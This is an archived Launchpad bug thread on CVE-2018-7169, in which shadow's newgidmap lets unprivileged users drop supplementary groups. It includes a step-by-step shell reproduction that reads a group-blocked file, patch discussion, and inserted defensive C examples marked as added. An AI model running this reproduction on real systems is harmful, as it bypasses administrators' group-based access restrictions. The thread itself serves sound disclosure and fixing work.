[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-07-16 Thread Bug Watch Updater
** Changed in: shadow (openSUSE)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-03-13 Thread Serge Hallyn
@stgraber @mdeslaur - I'd considered making a release for Ubuntu...  but
this is the negative acl thing...  Your opinions appreciated.


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-19 Thread Aleksa Sarai
https://github.com/shadow-maint/shadow/pull/99 includes the
allow_setgroups/deny_setgroups feature that we discussed earlier.


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-18 Thread Bug Watch Updater
Launchpad has imported 5 comments from the remote bug at
https://bugzilla.opensuse.org/show_bug.cgi?id=1081294.

If you reply to an imported comment from within Launchpad, your comment
will be sent to the remote bug automatically. Read more about
Launchpad's inter-bugtracker facilities at
https://help.launchpad.net/InterBugTracking.


On 2018-02-16T08:33:35+00:00 Kbabioch-b wrote:

CVE-2018-7169

An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and
allows an unprivileged user to be placed in a user namespace where setgroups(2)
is permitted. This allows an attacker to remove themselves from a supplementary
group, which may allow access to certain filesystem paths if the administrator
has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths.
This flaw effectively reverts a security feature in the kernel (in particular,
the /proc/self/setgroups knob) to prevent this sort of privilege escalation.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7169
http://www.cvedetails.com/cve/CVE-2018-7169/
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357

Reply at:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/comments/26


On 2018-02-16T08:38:46+00:00 Kbabioch-b wrote:

SUSE:SLE-12:Update is not affected, since newgidmap was only introduced
with 4.2.1. We still ship 4.1.5.1.

Reply at:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/comments/27


On 2018-02-16T08:49:09+00:00 Kbabioch-b wrote:

Fixed for Factory: sr#577189

Reply at:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/comments/28


On 2018-02-16T10:34:16+00:00 Mvetter wrote:

Thanks for adding the patch.
SR accepted. Forwarded to Factory as SR#577204.

Reply at:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/comments/29


On 2018-02-16T15:03:45+00:00 Kbabioch-b wrote:

Didn't realize that we backported this feature to our SLE12 codestream.
Applied the patch there, too: sr#155145

Reply at:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/comments/30


** Changed in: shadow (openSUSE)
   Status: Unknown => Confirmed

** Changed in: shadow (openSUSE)
   Importance: Unknown => Medium


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-18 Thread Aleksa Sarai
** Bug watch added: bugzilla.opensuse.org/ #1081294
   https://bugzilla.opensuse.org/show_bug.cgi?id=1081294

** Changed in: shadow (openSUSE)
   Importance: Undecided => Unknown

** Changed in: shadow (openSUSE)
   Status: New => Unknown

** Changed in: shadow (openSUSE)
 Remote watch: None => bugzilla.opensuse.org/ #1081294


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-15 Thread Aleksa Sarai
CVE-2018-7169 is assigned for this issue.

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-7169


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-15 Thread Aleksa Sarai
** Also affects: shadow (openSUSE)
   Importance: Undecided
   Status: New


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-15 Thread Aleksa Sarai
https://github.com/shadow-maint/shadow/pull/97 is my proposed patch. It
currently only deals with the immediate security issue of allowing users
that don't have

  % echo "$(whoami):$(id -g):1" >> /etc/subgid

... set up. I've tested this with a couple of different setups and it
appears to preserve behaviour when you're mapping subgid'd groups, but
it restricts setgroups if the mapping is a fallback one. I was working
on a patch for the flags code, but there's a lot of magic in the parsing
code for that -- so I will work on that separately.


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-15 Thread Craig Furman
It's really not a problem, I'm happy to leave it as it is.


Re: [Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-15 Thread Aleksa Sarai
On Thu, Feb 15, 2018 at 11:30 PM, Craig Furman
<1729...@bugs.launchpad.net> wrote:
> Thanks for the credit! I did highlight that the bug was in newgidmap in
> my initial report, by the way.

No problem -- you found the issue after all. Sorry for getting the timeline
wrong, did you want me to change the credits at all? It's your call.

> Aleksa, thanks for asking for a CVE? How did you go about this? This is
> new territory to me.

You just submit the online form at https://cveform.mitre.org/. You can also go
through the project if the project is registered with MITRE. (Canonical is
registered for example, but since this bug affects all distributions and not
just Ubuntu I felt it made more sense to just submit directly.)

There didn't appear to be any way for me to add you to Cc in the form (I could
only provide a single contact address), but I can forward the mails to you.

-- 
Aleksa Sarai (cyphar)
www.cyphar.com


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-15 Thread Craig Furman
Thanks for the credit! I did highlight that the bug was in newgidmap in
my initial report, by the way.

Aleksa, thanks for asking for a CVE? How did you go about this? This is
new territory to me.


Re: [Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-15 Thread Aleksa Sarai
Yes, of course. "Craig Furman (Pivotal)" is in the credits. I also
added Akihiro Suda (for suggesting to him that it was a newgidmap bug)
and myself (for working on a fix for it), but if Craig prefers I can
just make him the only credit.

On Thu, Feb 15, 2018 at 11:00 PM, Christian Brauner wrote:
> On Thu, Feb 15, 2018 at 11:29:03AM -, Aleksa Sarai wrote:
>> I've just sent a request for a CVE. I'm working on the patch now. My
>
> I assume the CVE will at least be correctly attributed to Craig.
>
> Christian
>
> Title:
>   unprivileged user can drop supplementary groups
>
> Status in shadow package in Ubuntu:
>   Confirmed
>
> Bug description:
>   Distribution: Ubuntu 16.04.3 LTS
>   Kernel: 4.4.0-97-generic
>   uidmap package version: 1:4.2-3.1ubuntu5.3
>
>   The newgidmap setuid executable allows any user to write a single
>   mapping line to the gid_map of a process whose identity is the same as
>   the calling process, as long as that mapping line maps the process's
>   own GID outside of the user namespace to GID 0 inside the user
>   namespace.
>
>   Newgidmap will write the mapping regardless of the content of
>   /proc/$process_being_mapped/setgroups, which will initially contain
>   the string "allow". After this mapping is performed, and also after
>   the process' uid_map is written with newuidmap, the process in the
>   user namespace will be able to use the setgroups system call to drop
>   supplementary groups.
>
>   This is possible even if there is no entry for the user in
>   /etc/subgid, because no subordinate GIDs are actually being used.
>
>   This allows any user to circumvent the use of supplementary groups as
>   blacklists, e.g. for some file owned by root:blacklist with permission
>   bits 0604 (octal). Normally any process whose identity included the
>   group "blacklist" in its supplementary groups would not be able to
>   read that file. By performing this exploit using newgidmap, they can
>   drop all supplementary groups and read that file.
>
>   If newgidmap was not available, unprivileged users would not be able
>   to write a process's gid_map until writing "deny" to
>   /proc/$pid/setgroups. A fix for this might be for newgidmap to check
>   the content of /proc/$process_being_mapped/setgroups is "deny", but we
>   have not tried to patch this ourselves.
>
>   An example using 2 login shells for a user named "someone" on Ubuntu
>   Xenial, with the uidmap package installed:
>
>   Shell 1
>
>   someone@ubuntu-xenial:~$ id
>   uid=1001(someone) gid=1001(someone) groups=1001(someone),1002(restricted)
>
>   someone@ubuntu-xenial:~$ ls -al /tmp/should_restrict
>   -rw----r-- 1 root restricted 8 Nov  1 12:23 /tmp/should_restrict
>
>   someone@ubuntu-xenial:~$ cat /tmp/should_restrict
>   cat: /tmp/should_restrict: Permission denied
>
>   someone@ubuntu-xenial:~$ unshare -U --setgroups allow #
>   /proc/self/setgroups already contains 'allow', but let's be explicit
>
>   nobody@ubuntu-xenial:~$ echo $$
>   1878
>
>   Shell 2
>
>   someone@ubuntu-xenial:~$ cat /etc/subuid
>   lxd:10:65536
>   root:10:65536
>   ubuntu:165536:65536
>
>   someone@ubuntu-xenial:~$ cat /etc/subgid
>   lxd:10:65536
>   root:10:65536
>   ubuntu:165536:65536
>
>   # There are no entries in /etc/sub{u,g}id for someone, but this
>   doesn't matter that much as subordinate IDs are not being requested.
>
>   someone@ubuntu-xenial:~$ newuidmap 1878 0 1001 1
>
>   someone@ubuntu-xenial:~$ newgidmap 1878 0 1001 1
>
>   Back to shell 1
>
>   nobody@ubuntu-xenial:~$ id
>   uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
>
>   # The presence of the "nogroup" supplementary group indicates that
>   some unmapped GIDs are present as supplementary GIDs. The kernel knows
>   that this process still has "restricted" in its supplementary groups,
>   so it can't read the restricted file yet.
>
>   nobody@ubuntu-xenial:~$ cat /tmp/should_restrict
>   cat: /tmp/should_restrict: Permission denied
>
>   # The process has gained CAP_SETGID in its user namespace by becoming
>   UID 0. /proc/$pid/setgroups contains "allow", so it can call
>   setgroups(2). By su-ing to root (itself, in the user namespace), it
>   can drop the supplementary groups. It can't read /root/.bashrc as that
>   file is owned by UID 0 in the initial user namespace, which creates
>   some distracting error output but doesn't matter in this case.
>
>   nobody@ubuntu-xenial:~$ su root
>   su: Authentication failure
>   (Ignored)
>   bash: /root/.bashrc: Permission denied
>
>   # Supplementary groups have been dropped
>
>   root@ubuntu-xenial:~# id
>   uid=0(root) gid=0(root) groups=0(root)
>
>   # It can read the restricted file
>
>   root@ubuntu-xenial:~# cat /tmp/should_restrict
>   content
>
> To manage notifications about this bug go to:
> 

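The report quoted above proposes that newgidmap check that /proc/$process_being_mapped/setgroups already reads "deny", and relies on the kernel rule that an unprivileged process cannot write gid_map until setgroups has been denied. The following is an added C example (shadow itself is written in C), not code from the thread or from the shadow project, showing both: a parser and check for the setgroups file, and a stand-alone main() that performs the two procfs writes in the order the kernel requires. The function names, the enum and the write_file() helper are this example's own; main() only demonstrates the ordering on a Linux host where unprivileged user namespaces are enabled.

```c
/* Added example, not code from the bug thread or from shadow: the kernel's
 * setgroups/gid_map ordering rule (see user_namespaces(7)) and the check the
 * original report proposes newgidmap should make before writing a gid_map.
 * Function names, the enum and write_file() are this example's own. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>

#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000 /* value from <linux/sched.h> */
#endif

enum setgroups_state { SETGROUPS_ALLOW, SETGROUPS_DENY, SETGROUPS_UNKNOWN };

/* Classify the contents of a /proc/<pid>/setgroups file ("allow\n" or "deny\n").
 * Anything else, including a prefix match such as "denyx", is UNKNOWN. */
enum setgroups_state parse_setgroups(const char *buf)
{
    if (strncmp(buf, "deny", 4) == 0 && (buf[4] == '\n' || buf[4] == '\0'))
        return SETGROUPS_DENY;
    if (strncmp(buf, "allow", 5) == 0 && (buf[5] == '\n' || buf[5] == '\0'))
        return SETGROUPS_ALLOW;
    return SETGROUPS_UNKNOWN;
}

/* Read and classify a setgroups file; UNKNOWN when it cannot be read. */
enum setgroups_state read_setgroups(const char *path)
{
    char buf[16];
    FILE *f = fopen(path, "r");
    if (!f)
        return SETGROUPS_UNKNOWN;
    size_t n = fread(buf, 1, sizeof(buf) - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_setgroups(buf);
}

/* The check proposed in the report: a setuid helper should only write a
 * gid_map for a process whose setgroups file already reads "deny", so the
 * mapped process can never use setgroups(2) to drop supplementary groups. */
int safe_to_write_gid_map(pid_t pid)
{
    char path[64];
    snprintf(path, sizeof(path), "/proc/%ld/setgroups", (long)pid);
    return read_setgroups(path) == SETGROUPS_DENY;
}

/* Write a short string to a file; 0 on success, -1 with errno set. procfs
 * reports a rejected write when the buffer is flushed, so fclose() is checked. */
static int write_file(const char *path, const char *data)
{
    FILE *f = fopen(path, "w");
    if (!f)
        return -1;
    int ok = fputs(data, f) != EOF;
    if (fclose(f) != 0)
        ok = 0;
    return ok ? 0 : -1;
}

/* Stand-alone demonstration of the ordering rule in a fresh user namespace.
 * syscall(SYS_unshare) is used so no feature macro is needed for unshare(). */
int main(void)
{
    char map[64];
    snprintf(map, sizeof(map), "0 %lu 1\n", (unsigned long)getgid());

    if (syscall(SYS_unshare, CLONE_NEWUSER) != 0) {
        perror("unshare(CLONE_NEWUSER)");
        return 1;
    }
    printf("fresh namespace: setgroups is %s\n",
           read_setgroups("/proc/self/setgroups") == SETGROUPS_ALLOW ? "allow" : "not allow");

    /* 1. With setgroups still "allow", an unprivileged gid_map write is refused (EPERM). */
    if (write_file("/proc/self/gid_map", map) != 0)
        printf("gid_map before setgroups=deny: %s\n", strerror(errno));

    /* 2. Deny setgroups first; the identical gid_map write is then accepted. */
    if (write_file("/proc/self/setgroups", "deny") != 0) {
        perror("write setgroups");
        return 1;
    }
    printf("safe_to_write_gid_map(self) = %d\n", safe_to_write_gid_map(getpid()));
    if (write_file("/proc/self/gid_map", map) != 0) {
        perror("write gid_map");
        return 1;
    }
    printf("gid_map written; setgroups(2) stays disabled in this namespace\n");
    return 0;
}
```

Build with `cc -Wall example.c -o example` and run it as an ordinary user: the first gid_map write fails with "Operation not permitted", the second succeeds, which is exactly the guard a setuid newgidmap sidesteps when it writes gid_map without first requiring "deny".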
Re: [Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-15 Thread Christian Brauner
On Thu, Feb 15, 2018 at 11:29:03AM -, Aleksa Sarai wrote:
> I've just sent a request for a CVE. I'm working on the patch now. My

I assume the CVE will at least be correctly attributed to Craig.

Christian


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-15 Thread Aleksa Sarai
I've just sent a request for a CVE. I'm working on the patch now. My
current plan is that allow_setgroups will be the default for all
mappings that are present in /etc/subgid -- but any "implicit" mappings
(like mapping your own group) will be deny_setgroups by default (because
that's the biggest security issue coming out of this bug -- that *any*
user can drop groups, not just the ones with subgids set up).


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-14 Thread Aleksa Sarai
I had a preliminary patch written, but it was getting quite complicated
(shadow's codebase is much more complicated than I expected -- and the
/etc/subgid parsing code is intertwined with the parsing code for all of
the other /etc/... files). I am working on it though.

I've also emailed the SUSE Security team about getting a CVE assigned,
though I'm not sure if it's better that we get it assigned or that the
Ubuntu folks get it assigned.


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-02-14 Thread Akihiro Suda
@cyphar

Did you submit patch/CVE?


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-01-15 Thread Aleksa Sarai
Serge: I will submit a patch later today. However, I just thought that
it's probably better that "allow_setgroups" should be "ignore_setgroups"
and we retain the current behaviour (we don't write anything to
/proc/$pid/setgroups) -- which allows a user (or runtime) to explicitly
disable setgroups even if they would normally have the right to use
setgroups.

Does that sound okay to you? I will make the default ignore_setgroups,
but IMO we should change the default for `useradd` to (by default) set
deny_setgroups.


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-01-15 Thread Aleksa Sarai
Oh, and we should definitely get a CVE assigned IMO.


Re: [Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-01-15 Thread Serge Hallyn
This sounds acceptable to me.  Issues or (even better) PRs against
github.com/shadow-maint/shadow would be great :)

Indeed the default should be the more permissible.  (I won't accept
patches which require changes to the container runtime.)


On Mon, Jan 15, 2018 at 9:13 AM, Akihiro Suda wrote:
>> And we define flags "allow_setgroups" and "deny_setgroups" (with
>> "deny_setgroups" being the default).
>
>
> I think allow_setgroups should be the default for keeping compatibility.
>
> However, useradd(8) may print warning for the default configuration.
>

[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-01-15 Thread Akihiro Suda
> And we define flags "allow_setgroups" and "deny_setgroups" (with
> "deny_setgroups" being the default).

I think allow_setgroups should be the default for keeping compatibility.

However, useradd(8) may print a warning for the default configuration.


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2018-01-15 Thread Aleksa Sarai
> Thanks for replying Eric, but I'm having trouble reproducing what you've
> posted. I can't write the gid map until I've written deny to
> /proc/$pid/setgroups, not the other way around. There might be some nuance
> I've missed.

Yes, this is a security feature. setgroups must be written to *before* gid_map
(the reason for this is explained further in user_namespaces(7)). And only
privileged users are allowed to write to gid_map if setgroups is set to allow.

> Also, newgidmap will allow a user to map their own GID to 0 in the user
> namespace, even when there is no entry for that user in /etc/subgid.

This is something that is generally required for a container to function, and
isn't fundamentally a security issue because users are already allowed to do
that without privileges (this is how rootless containers and LXC unprivileged
containers work) -- *unless* in this mode newgidmap is setting setgroups=allow
(in which case this is a major security problem).

> What if newgidmap wrote "deny" to /proc/$pid/setgroups unless the user is
> whitelisted in some config file, probably separate from /etc/subgid, as
> Stéphane suggested?

:+1: I'd prefer if we implemented this by changing the /etc/subgid schema so
that rather than having the format

   user:id:id_cnt

It has the format

   user:id:id_cnt[:flagA,flagB,...]

And we define flags "allow_setgroups" and "deny_setgroups" (with
"deny_setgroups" being the default). This way, administrators can be *explicit*
about the denial, we don't add any new configuration files, and it's backwards
compatible (with security being opt-out).

I imagine making deny_setgroups might be a *bit* contentious, but in the worst
case we could have a migration script that asks users (or just add a document
about it to the logfile for the upgrade).


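The message above proposes extending the /etc/subgid line format to `user:id:id_cnt[:flagA,flagB,...]` with the flags allow_setgroups and deny_setgroups, and the 2018-02-15 follow-up settles on allow_setgroups as the default for ranges listed in /etc/subgid while the implicit self-mapping of a user's own group gets deny_setgroups. Below is an added C example (shadow is a C code base), not code from the thread, the pull requests or the shadow project, with a parser for that extended line format and the decision newgidmap would derive from it for a requested mapping. The rejection of unknown flags, the range-coverage check, the `decide()` outcomes and all function names are this example's own assumptions; the later ignore_setgroups variant is not modelled.

```c
/* Added example, not code from the bug thread or from the shadow project:
 * a parser for the proposed /etc/subgid schema
 *     user:id:id_cnt[:flagA,flagB,...]
 * with the flags allow_setgroups / deny_setgroups, and the setgroups decision
 * newgidmap would derive from it. Defaults and names are this example's own. */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum setgroups_policy { SG_DENY, SG_ALLOW };

struct subgid_entry {
    char user[33];
    unsigned long start;   /* first subordinate gid */
    unsigned long count;   /* number of gids in the range */
    enum setgroups_policy policy;
};

/* Parse an unsigned decimal field; the whole field must be digits. */
static bool parse_ulong(const char *s, unsigned long *out)
{
    char *end;
    if (!isdigit((unsigned char)*s))
        return false;
    *out = strtoul(s, &end, 10);
    return *end == '\0';
}

/* Parse one line; 'dflt' applies when no flag is present. Malformed input and
 * unknown flags are errors, so a typo in the file can never widen a policy. */
bool parse_subgid_line(const char *line, enum setgroups_policy dflt,
                       struct subgid_entry *out)
{
    char buf[256];
    if (strlen(line) >= sizeof(buf))
        return false;
    strcpy(buf, line);
    buf[strcspn(buf, "\r\n")] = '\0';

    char *fields[4] = {0};
    char *p = buf;
    for (int i = 0; i < 4 && p; i++) {       /* split on ':' into at most 4 fields */
        fields[i] = p;
        p = strchr(p, ':');
        if (p)
            *p++ = '\0';
    }
    if (!fields[2] || p)                      /* fewer than 3 or more than 4 fields */
        return false;
    if (*fields[0] == '\0' || strlen(fields[0]) >= sizeof(out->user))
        return false;
    strcpy(out->user, fields[0]);
    if (!parse_ulong(fields[1], &out->start) || !parse_ulong(fields[2], &out->count) ||
        out->count == 0)
        return false;

    out->policy = dflt;
    for (char *flag = fields[3]; flag && *flag;) {
        char *comma = strchr(flag, ',');
        if (comma)
            *comma = '\0';
        if (strcmp(flag, "allow_setgroups") == 0)
            out->policy = SG_ALLOW;
        else if (strcmp(flag, "deny_setgroups") == 0)
            out->policy = SG_DENY;
        else
            return false;
        flag = comma ? comma + 1 : NULL;
    }
    return true;
}

enum decision { REFUSE, MAP_DENY_SETGROUPS, MAP_ALLOW_SETGROUPS };

/* What newgidmap should do with "<inside> <outside> <count>" requested by
 * 'caller' (own gid 'caller_gid'): a range inside one of the caller's entries
 * takes that entry's policy; the implicit self-mapping (own gid, count 1) with
 * no entry is mapped but only with setgroups denied; anything else is refused. */
enum decision decide(const struct subgid_entry *entries, size_t n,
                     const char *caller, unsigned long caller_gid,
                     unsigned long outside, unsigned long count)
{
    if (count == 0)
        return REFUSE;
    for (size_t i = 0; i < n; i++) {
        const struct subgid_entry *e = &entries[i];
        if (strcmp(e->user, caller) != 0)
            continue;
        /* overflow-safe: [outside, outside+count) within [start, start+e->count) */
        if (outside >= e->start && count <= e->count &&
            outside - e->start <= e->count - count)
            return e->policy == SG_DENY ? MAP_DENY_SETGROUPS : MAP_ALLOW_SETGROUPS;
    }
    if (outside == caller_gid && count == 1)
        return MAP_DENY_SETGROUPS;
    return REFUSE;
}

int main(void)
{
    /* Constructed sample of the extended format, not any real system's file. */
    const char *sample[] = { "ubuntu:165536:65536",                  /* default policy */
                             "builder:265536:65536:deny_setgroups" }; /* admin opts out */
    static const char *names[] = { "refuse", "map, setgroups=deny", "map, setgroups=allow" };
    struct subgid_entry entries[2];
    for (size_t i = 0; i < 2; i++)
        if (!parse_subgid_line(sample[i], SG_ALLOW, &entries[i]))
            return 1;
    printf("ubuntu  0 165536 65536 -> %s\n", names[decide(entries, 2, "ubuntu", 1000, 165536, 65536)]);
    printf("builder 0 265536 100   -> %s\n", names[decide(entries, 2, "builder", 1001, 265536, 100)]);
    printf("someone 0 1001 1       -> %s\n", names[decide(entries, 2, "someone", 1001, 1001, 1)]);
    printf("someone 0 0 1          -> %s\n", names[decide(entries, 2, "someone", 1001, 0, 1)]);
    return 0;
}
```

The self-mapping case is the one the bug is about: a user with no /etc/subgid entry can still map their own gid to 0 inside the namespace, and the decision forces setgroups to be denied for that mapping, so the mapped process cannot later drop a restricting supplementary group.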
[Bug 1729357] Re: unprivileged user can drop supplementary groups

2017-11-17 Thread Craig Furman
Thanks for replying Eric, but I'm having trouble reproducing what you've
posted. I can't write the gid map until I've written deny to
/proc/$pid/setgroups, not the other way around. There might be some
nuance I've missed.

Also, newgidmap will allow a user to map their own GID to 0 in the user
namespace, even when there is no entry for that user in /etc/subgid.

What if newgidmap wrote "deny" to /proc/$pid/setgroups unless the user
is whitelisted in some config file, probably separate from /etc/subgid,
as Stéphane suggested?


[Bug 1729357] Re: unprivileged user can drop supplementary groups

2017-11-13 Thread Seth Arnold
Eric W. Biederman contributed this via email:

> The short answer is that if you want negative acls to work don't try and
> apply them to a user in /etc/subuid or /etc/subgid.
> 
> To my knowledge there is not a good solution to this problem.
> 
> As for setting setgroups to deny that is the default setting if you do
> nothing.  Allow can't be set until the gid map is set.  Plus there
> are some inheritance rules that ensure if your parent has deny set you
> always will have deny set.
> 
> To date in my experience negative group acls are a theoretical construct
> that no one actually uses.

Given that there's no clear solution to this problem I'm going to make
this bug public, so others can know that subtracting permissions via group
membership isn't perfect.

Thanks


** Information type changed from Private Security to Public Security

** Changed in: shadow (Ubuntu)
   Status: New => Confirmed
